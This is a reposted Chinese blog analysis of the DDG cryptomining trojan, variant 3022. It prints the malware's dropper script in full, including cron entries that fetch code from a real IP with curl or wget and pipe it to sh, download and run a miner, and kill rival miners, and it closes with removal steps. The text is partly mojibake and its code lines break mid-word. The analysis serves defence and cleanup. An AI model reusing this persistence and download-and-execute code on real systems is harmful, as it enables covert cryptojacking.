生活随笔
收集整理的這篇文章主要介紹了
DDG全家桶之3022
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
本篇文章主要根據(jù)360Netlab新出的DDG分析文檔來復(fù)現(xiàn)新變種3022,會(huì)涉及部分分析和清除的方法,
本篇文章只用于學(xué)習(xí)交流,為廣大受害者提供清除思路 ,請(qǐng)勿用于非法用途,產(chǎn)生一切后果與作者無關(guān)
詳情請(qǐng)參考文檔:https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
一、下載
下載腳本:http://119.9.106.27:8000/i.sh(i.sh名稱位ddgs一貫的作風(fēng))
樣本地址:119.9.106.27:8000/static/3022/
首先下載i.sh腳本分析下里邊的內(nèi)容
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/
sbinecho "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -
echo "" > /
var/spool/cron/
rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /
var/spool/cron/
rootmkdir -p /
var/spool/cron/
crontabs
echo "" > /
var/spool/cron/crontabs/
rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /
var/spool/cron/crontabs/
rootcd /
tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/
writeableexport PATH=
$PATH:$(pwd)
ps auxf | grep -v grep | grep lrnbbce || rm -
rf lrnbbce
if [ ! -f
"lrnbbce" ]; thenwget -q http:
//119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce
fi
chmod +
x lrnbbce
$(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/
lrnbbceps auxf | grep -v grep | grep lrnbbcb | awk
'{print $2}' | xargs kill -
9
ps auxf | grep -v grep | grep lrnbbcc | awk
'{print $2}' | xargs kill -
9
ps auxf | grep -v grep | grep lrnbbcd | awk
'{print $2}' | xargs kill -
9`
ddg木馬的老套路了,寫環(huán)境變量、添加到定時(shí)任務(wù)、下載礦機(jī)執(zhí)行、刪除禁用其他挖礦木馬(挖礦行業(yè)競(jìng)爭(zhēng)很激烈了)
從3014版本開始增加了云端配置下發(fā) disable.sh 來集中干掉競(jìng)爭(zhēng)對(duì)手,
腳本地址:http://119.9.106.27:8000/static/disable.sh,內(nèi)容如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinuxif [ -e "/tmp/gates.lod" ]; thenrm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)kill -9 $(cat /tmp/gates.lod)rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)kill -9 $(cat /tmp/moni.lod)rm -rf /tmp/{gates,moni}.lod
fips auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
把同類的挖礦進(jìn)程放到了這個(gè)腳本中,來殺掉yilu、以及BillGate家族的gates進(jìn)程等
不過這都是之前版本的,現(xiàn)在這個(gè)更高級(jí)了,直接下發(fā)二進(jìn)制程序disable
這個(gè)disable的作用可以參考下360的那篇文章:圖片來自360netlab博客
?
目前為了阻止其它挖礦程序ddg3022主要做了以下措施
1.修改Hosts文件,阻止其它挖礦程序的下發(fā)
2.殺掉其它挖礦程序
3.使用二進(jìn)制文件disable
二、運(yùn)行復(fù)現(xiàn)
?接下來執(zhí)行腳本開始我們的復(fù)現(xiàn)過程 ,crontab已經(jīng)寫入
CPU已經(jīng)滿載,挖礦程序已經(jīng)在運(yùn)行
看下/tmp目錄下的樣本文件
?
三、清除
老套路,挖礦木馬干什么咱們反著來就是了
刪除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
刪除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce
kill掉進(jìn)程:6Tx3Wq,lrnbbce
此時(shí)挖礦程序已經(jīng)清理,后續(xù)可以刪除被增加的hosts等文件
?
參考文章:
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
?
?
轉(zhuǎn)載于:https://www.cnblogs.com/Id3al/p/10706324.html
總結(jié)
以上是生活随笔為你收集整理的DDG全家桶之3022的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。
